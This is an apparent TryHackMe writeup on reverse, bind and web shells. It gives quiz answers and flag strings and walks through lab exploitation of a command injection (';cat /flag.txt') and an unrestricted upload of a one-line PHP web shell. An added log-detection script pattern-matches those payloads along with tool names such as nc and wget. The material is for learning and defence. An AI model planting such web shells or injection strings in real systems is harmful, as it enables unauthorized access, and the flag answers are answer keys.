
Shells overview - TryHackMe writeup

Task 1 - Room Introduction


Q1. Click to complete the task.

No Answer Needed

Task 2 - Shell Overview


Q1. What is the command-line interface that allows users to interact with an operating system?

Answer 👉 Shell


Q2. What process involves using a compromised system as a launching pad to attack other machines in the network?

Answer 👉 Pivoting


Q3. What is a common activity attackers perform after obtaining shell access to escalate their privileges?

Answer 👉 Privilege Escalation

Task 3 - Reverse Shell


Q1. What type of shell allows an attacker to execute commands remotely after the target connects back?

Answer 👉 Reverse Shell


Q2. What tool is commonly used to set up a listener for a reverse shell?

Answer 👉 Netcat

Task 4 - Bind Shell


Q1. What type of shell opens a specific port on the target for incoming connections from the attacker?

Answer 👉 Bind Shell


Q2. Listening below which port number requires root access or privileged permissions?

Answer 👉 1024

Task 5 - Shell Listeners


Q1. Which flexible networking tool allows you to create a socket connection between two data sources?

Answer 👉 socat


Q2. Which command-line utility provides readline-style editing and command history for programs that lack it, enhancing the interaction with a shell listener?

Answer 👉 rlwrap


Q3. What is the improved version of Netcat distributed with the Nmap project that offers additional features like SSL support for listening to encrypted shells?

Answer 👉 ncat

Task 6 - Shell Payloads


Q1. Which Python module is commonly used for managing shell commands and establishing reverse shell connections in security assessments?

Answer 👉 subprocess


Q2. What shell payload method in a common scripting language uses the exec, shell_exec, system, passthru, and popen functions to execute commands remotely through a TCP connection?

Answer 👉 PHP


Q3. Which scripting language can use a reverse shell by exporting environment variables and creating a socket connection?

Answer 👉 Python

Task 7 - Web Shell


Q1. What vulnerability type allows attackers to upload a malicious script by failing to restrict file types?

Answer 👉 Unrestricted File Upload


Q2. What is a malicious script uploaded to a vulnerable web application to gain unauthorized access?

Answer 👉 Web Shell

Task 8 - Practical Task


The following information is given:
  • TARGET_IP:8080 hosts the landing page.
  • TARGET_IP:8081 hosts the web application that is vulnerable to command injection.
  • TARGET_IP:8082 hosts the web application that is vulnerable to an unrestricted file upload.

Q1. Using a reverse or bind shell, exploit the command injection vulnerability to get a shell. What is the content of the flag saved in the / directory?

  • Visit the given address, TARGET_IP:8081, to open the web application.
  • We know that there is a command injection, so let's try the input ;ls / and look at the result.
  • Use the command ;cat /flag.txt to get the flag.

Answer 👉 THM{0f28b3e1b00becf15d01a1151baf10fd713bc625}


Q2. Using a web shell, exploit the unrestricted file upload vulnerability and get a shell. What is the content of the flag saved in the / directory?

  • Visit the given address, TARGET_IP:8082, to open the upload page.
  • We know that it is vulnerable to unrestricted file upload, so let's upload a PHP file that contains the following code:

    <?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
    ?>

  • Name it web.php or whatever you want, and then upload the file. You can see a successful upload message at the top left.
  • Normally uploaded files are stored in the directory /upload or /uploads. In our case it is /uploads.
  • Let's execute our PHP code by visiting it and using the cmd GET parameter, which we wrote into the PHP code for command execution.
  • The final URL looks like: TARGET_IP:8082/uploads/web.php?cmd=cat+/flag.txt

Answer 👉 THM{202bb14ed12120b31300cfbbbdd35998786b44e5}
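
Seen from the defender's side, the final request above leaves a clear trace in the web server's access log: a script under the upload directory answering with a command in its query string. The following is an added example, not part of the original writeup, that flags such requests; the log lines, the /ping path, the host parameter and the function name inspect_line are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request and status fields of a Common/Combined Log Format line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Directories that should only ever serve static user content (assumption).
UPLOAD_DIRS = ("/upload/", "/uploads/")
# Extensions a server may hand to an interpreter instead of serving as a file.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar", ".jsp", ".aspx")
# Shell metacharacters and command words that rarely belong in a parameter value.
CMD_RE = re.compile(r"[;|`]|\$\(|\b(?:cat|ls|id|whoami|uname|wget|curl|nc|bash|sh)\b")


def inspect_line(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = LOG_RE.search(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    path = url.path.lower()
    findings = []
    if any(d in path for d in UPLOAD_DIRS) and path.endswith(SCRIPT_EXT):
        # Keep the status: a 200 means the uploaded script was reachable.
        findings.append(f"script-in-upload-dir:{m['status']}")
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if CMD_RE.search(value):  # value is already URL-decoded here
            findings.append(f"command-like-param:{name}")
    return findings


# Constructed sample lines; 203.0.113.0/24 is a documentation address range.
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /uploads/web.php?cmd=cat+/flag.txt HTTP/1.1" 200 45',
    '203.0.113.7 - - [01/Jan/2025:10:00:05 +0000] "GET /uploads/cat.png HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2025:10:01:00 +0000] "GET /uploads/x.phtml HTTP/1.1" 403 199',
    '203.0.113.9 - - [01/Jan/2025:10:02:00 +0000] "GET /search?q=red+shoes HTTP/1.1" 200 900',
    '203.0.113.9 - - [01/Jan/2025:10:03:00 +0000] "GET /ping?host=%3Bls+%2F HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(inspect_line(line) or "clean", "<-", line.split('"')[1])
```

Only GET query strings appear in access logs, so input sent in a POST body needs request-body logging or a WAF to be visible to this kind of check.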

Task 9 - Conclusion


Q1. I have successfully completed the room, and I now understand how Reverse Shells, Bind Shells, and Web Shells work!

No Answer Needed